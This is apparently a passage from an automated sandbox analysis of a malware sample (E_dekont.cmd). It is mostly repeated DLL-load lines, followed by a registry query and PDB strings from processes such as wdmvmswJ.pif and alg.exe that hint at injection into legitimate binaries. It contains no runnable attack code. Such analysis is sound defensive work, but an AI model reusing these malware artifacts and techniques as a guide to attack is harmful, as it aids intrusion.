Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\x.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: E_dekont.cmd Static file information: File size 1052051 > 1048576
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: wdmvmswJ.pif, 0000000C.00000003.1554599936.0000000023230000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: wdmvmswJ.pif, 0000000C.00000003.1983421861.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: wdmvmswJ.pif, 0000000C.00000003.2098174285.0000000024350000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: msiexec.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1706447973.0000000024370000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: alg.exe, 00000010.00000003.2977864019.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: mavinject32.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.2383278080.0000000020960000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2379043668.0000000020950000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2926599466.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PresentationFontCache.pdb source: wdmvmswJ.pif, 0000000C.00000003.1618765999.0000000024380000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2877167712.0000000001480000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: PerceptionSimulationService.pdb source: wdmvmswJ.pif, 0000000C.00000003.1721671796.0000000024360000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: wdmvmswJ.pif, 0000000C.00000003.2072870006.0000000020950000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MsSense.pdbGCTL source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: wdmvmswJ.pif, 0000000C.00000003.2359651772.000000001E730000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2923425427.00000000012C0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: MsSense.pdb source: wdmvmswJ.pif, 0000000C.00000003.1785492049.0000000025210000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: wdmvmswJ.pif, 0000000C.00000003.2276020899.000000001E5F0000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000000C.00000003.2267524660.000000001E750000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000010.00000003.2912565360.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\tnameserv_objs\tnameserv.pdb source: alg.exe, 00000010.00000003.2990957366.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\servertool_objs\servertool.pdb source: alg.exe, 00000010.00000003.2987868731.0000000000460000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: ping.pdb source: esentutl.exe, 00000009.00000003.1537565062.0000000004D90000.00000004.00001000.00020000.00000000.sdmp, xpha.pif, xpha.pif, 00000012.00000000.1589664905.0000000000891000.00000020.00000001.01000000.0000000C.sdmp
